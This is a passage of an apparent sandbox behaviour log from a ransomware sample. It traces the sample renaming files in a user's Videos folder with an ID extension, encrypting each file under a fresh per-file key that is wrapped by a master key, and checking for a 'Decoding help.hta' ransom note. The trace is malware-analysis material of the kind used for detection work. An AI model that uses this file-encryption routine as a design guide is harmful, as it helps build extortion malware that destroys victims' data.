0x8cb0000 [0043.200] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x17cdfbe4*, pdwDataLen=0x17cdfcf8*=0x40, dwBufLen=0x100 | out: pbData=0x17cdfbe4*, pdwDataLen=0x17cdfcf8*=0x100) returned 1 [0043.200] CryptEncrypt (in: hKey=0x6714f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8cb0000*, pdwDataLen=0x17cdfce4*=0x1e0, dwBufLen=0x1e0 | out: pbData=0x8cb0000*, pdwDataLen=0x17cdfce4*=0x1e0) returned 1 [0043.200] UnmapViewOfFile (lpBaseAddress=0x8cb0000) returned 1 [0043.202] CloseHandle (hObject=0x6c0) returned 1 [0043.202] CryptDestroyKey (hKey=0x6714f0) returned 1 [0043.202] CryptReleaseContext (hProv=0x3448b60, dwFlags=0x0) returned 1 [0043.202] SetFilePointerEx (in: hFile=0x5a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.202] WriteFile (in: hFile=0x5a8, lpBuffer=0x17cdfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x17cdfcf8, lpOverlapped=0x0 | out: lpBuffer=0x17cdfbe4*, lpNumberOfBytesWritten=0x17cdfcf8*=0x100, lpOverlapped=0x0) returned 1 [0043.203] WriteFile (in: hFile=0x5a8, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x17cdfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x17cdfcf8*=0x500, lpOverlapped=0x0) returned 1 [0043.203] CloseHandle (hObject=0x5a8) returned 1 [0043.204] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0043.204] FindNextFileW (in: hFindFile=0x5d8a10, lpFindFileData=0x17cdfd30 | out: lpFindFileData=0x17cdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24ec720, ftCreationTime.dwHighDateTime=0x1d4d4ea, ftLastAccessTime.dwLowDateTime=0xc0d43d60, ftLastAccessTime.dwHighDateTime=0x1d4c8ce, ftLastWriteTime.dwLowDateTime=0xc0d43d60, ftLastWriteTime.dwHighDateTime=0x1d4c8ce, nFileSizeHigh=0x0, nFileSizeLow=0x245e, dwReserved0=0x0, dwReserved1=0x0, cFileName="DiD_6nqj9.avi", cAlternateFileName="DID_6N~1.AVI")) returned 1 [0043.204] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*" [0043.204] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*") returned 44 [0043.204] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Decoding help.hta" [0043.204] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\decoding help.hta")) returned 0x1 [0043.204] lstrcmpiW (lpString1="Decoding help.hta", lpString2="DiD_6nqj9.avi") returned -1 [0043.204] lstrlenW (lpString="DiD_6nqj9.avi") returned 13 [0043.204] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*" [0043.204] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*") returned 44 [0043.204] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="DiD_6nqj9.avi" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DiD_6nqj9.avi") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DiD_6nqj9.avi" [0043.204] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DiD_6nqj9.avi" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DiD_6nqj9.avi") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DiD_6nqj9.avi" [0043.204] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DiD_6nqj9.avi", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DiD_6nqj9.avi.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DiD_6nqj9.avi.[ID]g9uZrLhJaygpwRm1[ID]" [0043.205] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DiD_6nqj9.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\did_6nqj9.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DiD_6nqj9.avi.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\did_6nqj9.avi.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0043.207] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DiD_6nqj9.avi.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\did_6nqj9.avi.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a8 [0043.207] CreateFileMappingA (hFile=0x5a8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x6c0 [0043.207] CryptAcquireContextA (in: phProv=0x17cdfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x17cdfcec*=0x3448b60) returned 1 [0043.208] CryptGenKey (in: hProv=0x3448b60, Algid=0x6610, dwFlags=0x1, phKey=0x17cdfce8 | out: phKey=0x17cdfce8*=0x671830) returned 1 [0043.208] CryptExportKey (in: hKey=0x671830, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x17cdfbe4, pdwDataLen=0x17cdfce4 | out: pbData=0x17cdfbe4*, pdwDataLen=0x17cdfce4*=0x2c) returned 1 [0043.208] MapViewOfFile (hFileMappingObject=0x6c0, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2440) returned 0x8cb0000 [0043.210] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x17cdfbe4*, pdwDataLen=0x17cdfcf8*=0x40, dwBufLen=0x100 | out: pbData=0x17cdfbe4*, pdwDataLen=0x17cdfcf8*=0x100) returned 1 [0043.210] CryptEncrypt (in: hKey=0x671830, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8cb0000*, pdwDataLen=0x17cdfce4*=0x2440, dwBufLen=0x2440 | out: pbData=0x8cb0000*, pdwDataLen=0x17cdfce4*=0x2440) returned 1 [0043.210] UnmapViewOfFile (lpBaseAddress=0x8cb0000) returned 1 [0043.212] CloseHandle (hObject=0x6c0) returned 1 [0043.212] CryptDestroyKey (hKey=0x671830) returned 1 [0043.212] CryptReleaseContext (hProv=0x3448b60, dwFlags=0x0) returned 1 [0043.212] SetFilePointerEx (in: hFile=0x5a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.212] WriteFile (in: hFile=0x5a8, lpBuffer=0x17cdfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x17cdfcf8, lpOverlapped=0x0 | out: lpBuffer=0x17cdfbe4*, lpNumberOfBytesWritten=0x17cdfcf8*=0x100, lpOverlapped=0x0) returned 1 [0043.213] WriteFile (in: hFile=0x5a8, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x17cdfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x17cdfcf8*=0x500, lpOverlapped=0x0) returned 1 [0043.213] CloseHandle (hObject=0x5a8) returned 1 [0043.214] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DiD_6nqj9.avi.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0043.214] FindNextFileW (in: hFindFile=0x5d8a10, lpFindFileData=0x17cdfd30 | out: lpFindFileData=0x17cdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39f98be0, ftCreationTime.dwHighDateTime=0x1d4d4e2, ftLastAccessTime.dwLowDateTime=0x6f60d210, ftLastAccessTime.dwHighDateTime=0x1d4c81d, ftLastWriteTime.dwLowDateTime=0x6f60d210, ftLastWriteTime.dwHighDateTime=0x1d4c81d, nFileSizeHigh=0x0, nFileSizeLow=0x14aa3, dwReserved0=0x0, dwReserved1=0x0, cFileName="skaxmF9z-Qgjk.mp4", cAlternateFileName="SKAXMF~1.MP4")) returned 1 [0043.214] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*" [0043.214] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*") returned 44 [0043.214] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Decoding help.hta" [0043.214] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\decoding help.hta")) returned 0x1 [0043.214] lstrcmpiW (lpString1="Decoding help.hta", lpString2="skaxmF9z-Qgjk.mp4") returned -1 [0043.214] lstrlenW (lpString="skaxmF9z-Qgjk.mp4") returned 17 [0043.214] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*" [0043.214] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*") returned 44 [0043.214] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="skaxmF9z-Qgjk.mp4" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\skaxmF9z-Qgjk.mp4") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\skaxmF9z-Qgjk.mp4" [0043.214] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\skaxmF9z-Qgjk.mp4" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\skaxmF9z-Qgjk.mp4") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\skaxmF9z-Qgjk.mp4" [0043.214] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\skaxmF9z-Qgjk.mp4", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\skaxmF9z-Qgjk.mp4.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\skaxmF9z-Qgjk.mp4.[ID]g9uZrLhJaygpwRm1[ID]" [0043.214] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\skaxmF9z-Qgjk.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\skaxmf9z-qgjk.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\skaxmF9z-Qgjk.mp4.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\skaxmf9z-qgjk.mp4.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0043.215] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\skaxmF9z-Qgjk.mp4.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\skaxmf9z-qgjk.mp4.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a8 [0043.215] CreateFileMappingA (hFile=0x5a8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x6c0 [0043.215] CryptAcquireContextA (in: phProv=0x17cdfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x17cdfcec*=0x3448b60) returned 1 [0043.216] CryptGenKey (in: hProv=0x3448b60, Algid=0x6610, dwFlags=0x1, phKey=0x17cdfce8 | out: phKey=0x17cdfce8*=0x6714f0) returned 1 [0043.216] CryptExportKey (in: hKey=0x6714f0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x17cdfbe4, pdwDataLen=0x17cdfce4 | out: pbData=0x17cdfbe4*, pdwDataLen=0x17cdfce4*=0x2c) returned 1 [0043.216] MapViewOfFile (hFileMappingObject=0x6c0, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x14aa0) returned 0x8cb0000 [0043.217] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x17cdfbe4*, pdwDataLen=0x17cdfcf8*=0x40, dwBufLen=0x100 | out: pbData=0x17cdfbe4*, pdwDataLen=0x17cdfcf8*=0x100) returned 1 [0043.217] CryptEncrypt (in: hKey=0x6714f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8cb0000, pdwDataLen=0x17cdfce4*=0x14aa0, dwBufLen=0x14aa0 | out: pbData=0x8cb0000*, pdwDataLen=0x17cdfce4*=0x14aa0) returned 1 [0044.058] UnmapViewOfFile (lpBaseAddress=0x8cb0000) returned 1 [0044.061] CloseHandle (hObject=0x6c0) returned 1 [0044.061] CryptDestroyKey (hKey=0x6714f0) returned 1 [0044.061] CryptReleaseContext (hProv=0x3448b60, dwFlags=0x0) returned 1 [0044.061] SetFilePointerEx (in: hFile=0x5a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0044.061] WriteFile (in: hFile=0x5a8, lpBuffer=0x17cdfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x17cdfcf8, lpOverlapped=0x0 | out: lpBuffer=0x17cdfbe4*, lpNumberOfBytesWritten=0x17cdfcf8*=0x100, lpOverlapped=0x0) returned 1 [0044.062] WriteFile (in: hFile=0x5a8, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x17cdfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x17cdfcf8*=0x500, lpOverlapped=0x0) returned 1 [0044.062] CloseHandle (hObject=0x5a8) returned 1 [0044.063] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\skaxmF9z-Qgjk.mp4.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0044.064] FindNextFileW (in: hFindFile=0x5d8a10, lpFindFileData=0x17cdfd30 | out: lpFindFileData=0x17cdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82803900, ftCreationTime.dwHighDateTime=0x1d4d351, ftLastAccessTime.dwLowDateTime=0x62773050, ftLastAccessTime.dwHighDateTime=0x1d4d0ea, ftLastWriteTime.dwLowDateTime=0x62773050, ftLastWriteTime.dwHighDateTime=0x1d4d0ea, nFileSizeHigh=0x0, nFileSizeLow=0x9825, dwReserved0=0x0, dwReserved1=0x0, cFileName="U9nNDtOagrcsbbNXoq7.avi", cAlternateFileName="U9NNDT~1.AVI")) returned 1 [0046.600] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*" [0046.600] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*") returned 44 [0046.600] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Decoding help.hta" [0046.600] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\decoding help.hta")) returned 0x1 [0046.601] lstrcmpiW (lpString1="Decoding help.hta", lpString2="U9nNDtOagrcsbbNXoq7.avi") returned -1 [0046.601] lstrlenW (lpString="U9nNDtOagrcsbbNXoq7.avi") returned 23 [0046.601] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*" [0046.601] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*") returned 44 [0046.601] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="U9nNDtOagrcsbbNXoq7.avi" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\U9nNDtOagrcsbbNXoq7.avi") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\U9nNDtOagrcsbbNXoq7.avi" [0046.601] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\U9nNDtOagrcsbbNXoq7.avi" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\U9nNDtOagrcsbbNXoq7.avi") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\U9nNDtOagrcsbbNXoq7.avi" [0046.601] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\U9nNDtOagrcsbbNXoq7.avi", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\U9nNDtOagrcsbbNXoq7.avi.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\U9nNDtOagrcsbbNXoq7.avi.[ID]g9uZrLhJaygpwRm1[ID]" [0046.601] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\U9nNDtOagrcsbbNXoq7.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\u9nndtoagrcsbbnxoq7.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\U9nNDtOagrcsbbNXoq7.avi.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\u9nndtoagrcsbbnxoq7.avi.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0046.601] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\U9nNDtOagrcsbbNXoq7.avi.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\u9nndtoagrcsbbnxoq7.avi.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6d8 [0046.601] CreateFileMappingA (hFile=0x6d8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x6ec [0046.602] CryptAcquireContextA (in: phProv=0x17cdfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x17cdfcec*=0x3448f18) returned 1 [0046.602] CryptGenKey (in: hProv=0x3448f18, Algid=0x6610, dwFlags=0x1, phKey=0x17cdfce8 | out: phKey=0x17cdfce8*=0x5da638) returned 1 [0046.602] CryptExportKey (in: hKey=0x5da638, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x17cdfbe4, pdwDataLen=0x17cdfce4 | out: pbData=0x17cdfbe4*, pdwDataLen=0x17cdfce4*=0x2c) returned 1 [0046.602] MapViewOfFile (hFileMappingObject=0x6ec, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x9820) returned 0x530000 [0046.604] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x17cdfbe4*, pdwDataLen=0x17cdfcf8*=0x40, dwBufLen=0x100 | out: pbData=0x17cdfbe4*, pdwDataLen=0x17cdfcf8*=0x100) returned 1 [0046.604] CryptEncrypt (in: hKey=0x5da638, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x530000, pdwDataLen=0x17cdfce4*=0x9820, dwBufLen=0x9820 | out: pbData=0x530000*, pdwDataLen=0x17cdfce4*=0x9820) returned 1 [0046.605] UnmapViewOfFile (lpBaseAddress=0x530000) returned 1 [0046.606] CloseHandle (hObject=0x6ec) returned 1 [0046.606] CryptDestroyKey (hKey=0x5da638) returned 1 [0046.607] CryptReleaseContext (hProv=0x3448f18, dwFlags=0x0) returned 1 [0046.607] SetFilePointerEx (in: hFile=0x6d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0046.607] WriteFile (in: hFile=0x6d8, lpBuffer=0x17cdfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x17cdfcf8, lpOverlapped=0x0 | out: lpBuffer=0x17cdfbe4*, lpNumberOfBytesWritten=0x17cdfcf8*=0x100, lpOverlapped=0x0) returned 1 [0046.608] WriteFile (in: hFile=0x6d8, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x17cdfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x17cdfcf8*=0x500, lpOverlapped=0x0) returned 1 [0046.608] CloseHandle (hObject=0x6d8) returned 1 [0046.609] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\U9nNDtOagrcsbbNXoq7.avi.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0046.609] FindNextFileW (in: hFindFile=0x5d8a10, lpFindFileData=0x17cdfd30 | out: lpFindFileData=0x17cdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7dfcee90, ftCreationTime.dwHighDateTime=0x1d4cab0, ftLastAccessTime.dwLowDateTime=0xfd689b80, ftLastAccessTime.dwHighDateTime=0x1d4cfd2, ftLastWriteTime.dwLowDateTime=0xfd689b80, ftLastWriteTime.dwHighDateTime=0x1d4cfd2, nFileSizeHigh=0x0, nFileSizeLow=0x66be, dwReserved0=0x0, dwReserved1=0x0, cFileName="uZ8yb2pzJzSAO1.mp4", cAlternateFileName="UZ8YB2~1.MP4")) returned 1 [0046.609] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*" [0046.609] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*") returned 44 [0046.609] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Decoding help.hta" [0046.609] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\decoding help.hta")) returned 0x1 [0046.609] lstrcmpiW (lpString1="Decoding help.hta", lpString2="uZ8yb2pzJzSAO1.mp4") returned -1 [0046.609] lstrlenW (lpString="uZ8yb2pzJzSAO1.mp4") returned 18 [0046.609] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*" [0046.610] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*") returned 44 [0046.610] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="uZ8yb2pzJzSAO1.mp4" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uZ8yb2pzJzSAO1.mp4") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uZ8yb2pzJzSAO1.mp4" [0046.610] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uZ8yb2pzJzSAO1.mp4" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uZ8yb2pzJzSAO1.mp4") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uZ8yb2pzJzSAO1.mp4" [0046.610] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uZ8yb2pzJzSAO1.mp4", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uZ8yb2pzJzSAO1.mp4.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uZ8yb2pzJzSAO1.mp4.[ID]g9uZrLhJaygpwRm1[ID]" [0046.610] MoveFileW 